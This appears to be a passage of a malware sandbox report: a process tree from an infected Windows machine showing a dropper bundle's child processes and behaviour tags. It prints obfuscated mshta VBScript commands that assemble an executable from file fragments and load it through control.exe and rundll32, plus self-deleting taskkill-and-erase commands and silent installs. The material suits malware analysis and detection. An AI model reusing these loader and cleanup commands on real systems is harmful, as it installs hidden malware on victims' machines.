                                                                                                            10⤵
                                                                                                            • Checks whether UAC is enabled
                                                                                                            PID:6476
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /R TYPE "C:\Users\Admin\AppData\Local\Temp\S97FKkMft.eXE" > S97FKkMft.eXE && StaRt S97FKKMfT.ExE /pCoj8sO2ZQIDueyiPfNb5DUkuG7xWcK& IF "/pCoj8sO2ZQIDueyiPfNb5DUkuG7xWcK" == "" for %Q iN ( "C:\Users\Admin\AppData\Local\Temp\S97FKkMft.eXE" ) do taskkill -iM "%~NxQ" /F
                                                                                                              11⤵
                                                                                                                PID:6680
                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                              "C:\Windows\System32\mshta.exe" vBsCRIPt: ClOse ( creaTEObJeCt ( "wScRIPt.Shell" ). RUN ( "cMD.ExE /r ECho | sEt /P = ""MZ"" > EddJYb.9BC &cOPy /B /y EDdJYB.9BC + eHAg4.2 + as8RZQxR.V + B4fStFA.RY7+ AZRE.U d1EAs3R.FR &stArt control.exe .\d1eAS3R.Fr " , 0 , TruE) )
                                                                                                              10⤵
                                                                                                              • Checks whether UAC is enabled
                                                                                                              PID:5356
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /r ECho | sEt /P = "MZ" > EddJYb.9BC &cOPy /B /y EDdJYB.9BC + eHAg4.2 + as8RZQxR.V +B4fStFA.RY7+ AZRE.U d1EAs3R.FR &stArt control.exe .\d1eAS3R.Fr
                                                                                                                11⤵
                                                                                                                • Checks whether UAC is enabled
                                                                                                                PID:4940
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" ECho "
                                                                                                                  12⤵
                                                                                                                    PID:3244
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>EddJYb.9BC"
                                                                                                                    12⤵
                                                                                                                      PID:6208
                                                                                                                    • C:\Windows\SysWOW64\control.exe
                                                                                                                      control.exe .\d1eAS3R.Fr
                                                                                                                      12⤵
                                                                                                                        PID:6560
                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\d1eAS3R.Fr
                                                                                                                          13⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:6636
                                                                                                                          • C:\Windows\system32\RunDll32.exe
                                                                                                                            C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\d1eAS3R.Fr
                                                                                                                            14⤵
                                                                                                                              PID:5224
                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\d1eAS3R.Fr
                                                                                                                                15⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                PID:872
                                                                                                            • C:\Users\Admin\AppData\Roaming\8728783.scr
                                                                                                              "C:\Users\Admin\AppData\Roaming\8728783.scr" /S
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:524
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c Wed15228d911b9d5c.exe
                                                                                                          4⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4252
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15228d911b9d5c.exe
                                                                                                            Wed15228d911b9d5c.exe
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks computer location settings
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:1788
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1856
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Program crash
                                                                                                              PID:4392
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2008
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:6896
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c Wed1556d5b7e9b2c8.exe
                                                                                                          4⤵
                                                                                                            PID:1076
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed1556d5b7e9b2c8.exe
                                                                                                              Wed1556d5b7e9b2c8.exe
                                                                                                              5⤵
                                                                                                                PID:2912
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c Wed15cdfe4f1ee8.exe
                                                                                                              4⤵
                                                                                                                PID:868
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15cdfe4f1ee8.exe
                                                                                                                  Wed15cdfe4f1ee8.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:2244
                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                    "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15cdfe4f1ee8.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15cdfe4f1ee8.exe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )
                                                                                                                    6⤵
                                                                                                                      PID:4488
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15cdfe4f1ee8.exe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15cdfe4f1ee8.exe" ) do taskkill -F -Im "%~nXU"
                                                                                                                        7⤵
                                                                                                                          PID:5008
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
                                                                                                                            SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
                                                                                                                            8⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Checks whether UAC is enabled
                                                                                                                            PID:4396
                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                              "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )
                                                                                                                              9⤵
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              PID:3920
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
                                                                                                                                10⤵
                                                                                                                                  PID:4120
                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                "C:\Windows\System32\mshta.exe" vBsCRipT: CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn ("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
                                                                                                                                9⤵
                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                PID:5156
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
                                                                                                                                  10⤵
                                                                                                                                    PID:1192
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                                                                                      11⤵
                                                                                                                                        PID:6560
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
                                                                                                                                        11⤵
                                                                                                                                          PID:6624
                                                                                                                                        • C:\Windows\SysWOW64\control.exe
                                                                                                                                          control .\FUEj5.QM
                                                                                                                                          11⤵
                                                                                                                                            PID:6404
                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
                                                                                                                                              12⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:5704
                                                                                                                                              • C:\Windows\system32\RunDll32.exe
                                                                                                                                                C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
                                                                                                                                                13⤵
                                                                                                                                                  PID:6880
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
                                                                                                                                                    14⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:3596
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill -F -Im "Wed15cdfe4f1ee8.exe"
                                                                                                                                        8⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:5204
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c Wed15e2f113a40ce5.exe
                                                                                                                                4⤵
                                                                                                                                  PID:1468
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15e2f113a40ce5.exe
                                                                                                                                    Wed15e2f113a40ce5.exe
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:2660
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15e2f113a40ce5.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15e2f113a40ce5.exe
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4668
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15e2f113a40ce5.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15e2f113a40ce5.exe
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3980
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c Wed15bfd6504f7748c.exe /mixone
                                                                                                                                  4⤵
                                                                                                                                    PID:1320
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15bfd6504f7748c.exe
                                                                                                                                      Wed15bfd6504f7748c.exe /mixone
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:2612
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 660
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:5468
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 676
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:5996
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 636
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:5580
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 668
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:5660
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 892
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:6548
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 940
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:5328
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 1188
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:6900
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 1256
                                                                                                                                        6⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:3080
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "Wed15bfd6504f7748c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15bfd6504f7748c.exe" & exit
                                                                                                                                        6⤵
                                                                                                                                          PID:828
                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                            taskkill /im "Wed15bfd6504f7748c.exe" /f
                                                                                                                                            7⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            PID:6644
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c Wed15c2e7469a14dca.exe
                                                                                                                                      4⤵
                                                                                                                                        PID:2060
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15c2e7469a14dca.exe
                                                                                                                                          Wed15c2e7469a14dca.exe
                                                                                                                                          5⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          PID:3312
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im Wed15c2e7469a14dca.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15c2e7469a14dca.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                            6⤵
                                                                                                                                              PID:7812
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                taskkill /im Wed15c2e7469a14dca.exe /f
                                                                                                                                                7⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:8024
                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                timeout /t 6
                                                                                                                                                7⤵
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:7324
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c Wed15fbd6ef41b4f.exe
                                                                                                                                          4⤵
                                                                                                                                            PID:1784
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15fbd6ef41b4f.exe
                                                                                                                                              Wed15fbd6ef41b4f.exe
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4716
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-0RAJ6.tmp\Wed15fbd6ef41b4f.tmp
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-0RAJ6.tmp\Wed15fbd6ef41b4f.tmp" /SL5="$20150,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15fbd6ef41b4f.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                PID:2788
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-9QTTP.tmp\Sayma.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-9QTTP.tmp\Sayma.exe" /S /UID=burnerch2
                                                                                                                                                  7⤵
                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:4108
                                                                                                                                                  • C:\Program Files\Windows Media Player\AOLTIAAQSU\ultramediaburner.exe
                                                                                                                                                    "C:\Program Files\Windows Media Player\AOLTIAAQSU\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                    8⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:6668
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-EFFLP.tmp\ultramediaburner.tmp
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-EFFLP.tmp\ultramediaburner.tmp" /SL5="$603DA,281924,62464,C:\Program Files\Windows Media Player\AOLTIAAQSU\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                      9⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                      PID:6600
                                                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                        10⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                        PID:6532
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\6b-e2fc8-5df-404ae-88648adde26e0\Heqidolaepe.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\6b-e2fc8-5df-404ae-88648adde26e0\Heqidolaepe.exe"
                                                                                                                                                    8⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    PID:2244
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\be-223de-36e-2f9be-830ee7b6a435f\Waecelelire.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\be-223de-36e-2f9be-830ee7b6a435f\Waecelelire.exe"
                                                                                                                                                    8⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                    PID:6392
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\scea4zum.1i3\GcleanerEU.exe /eufive & exit
                                                                                                                                                      9⤵
                                                                                                                                                        PID:7668
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\scea4zum.1i3\GcleanerEU.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\scea4zum.1i3\GcleanerEU.exe /eufive
                                                                                                                                                          10⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:7392
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7392 -s 648
                                                                                                                                                            11⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:7324
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7392 -s 652
                                                                                                                                                            11⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:5504
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7392 -s 764
                                                                                                                                                            11⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:5832
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7392 -s 784
                                                                                                                                                            11⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:6800
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7392 -s 884
                                                                                                                                                            11⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:6380
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7392 -s 932
                                                                                                                                                            11⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:8024
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7392 -s 1180
                                                                                                                                                            11⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:5964
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7392 -s 1212
                                                                                                                                                            11⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:776
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\scea4zum.1i3\GcleanerEU.exe" & exit
                                                                                                                                                            11⤵
                                                                                                                                                              PID:6212
                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                taskkill /im "GcleanerEU.exe" /f
                                                                                                                                                                12⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:5388
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubxbfxue.efz\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                          9⤵
                                                                                                                                                            PID:7792
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ubxbfxue.efz\installer.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\ubxbfxue.efz\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                              10⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                              PID:7176
                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ubxbfxue.efz\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ubxbfxue.efz\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632941496 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:5660
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aancvfvk.ncp\any.exe & exit
                                                                                                                                                              9⤵
                                                                                                                                                                PID:7908
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\aancvfvk.ncp\any.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\aancvfvk.ncp\any.exe
                                                                                                                                                                  10⤵
                                                                                                                                                                    PID:2632
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hbnfsprt.u4h\gcleaner.exe /mixfive & exit
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:6344
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\hbnfsprt.u4h\gcleaner.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\hbnfsprt.u4h\gcleaner.exe /mixfive
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:5588
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 648
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                          PID:6840
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 688
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:4880
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 764
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:6460
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 812
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:5504
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 876
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:6552
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 920
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:5244
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 1168
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:4268
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 1180
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:4948
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\hbnfsprt.u4h\gcleaner.exe" & exit
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:776
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              taskkill /im "gcleaner.exe" /f
                                                                                                                                                                              12⤵
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:7716
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c0q0vasd.0dm\autosubplayer.exe /S & exit
                                                                                                                                                                        9⤵
                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:5632
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c Wed150b6a68b74a9.exe
                                                                                                                                                              4⤵
                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                              PID:660
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c Wed15ac1df9305ded09.exe
                                                                                                                                                              4⤵
                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                              PID:596
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15ac1df9305ded09.exe
                                                                                                                                                                Wed15ac1df9305ded09.exe
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:2584
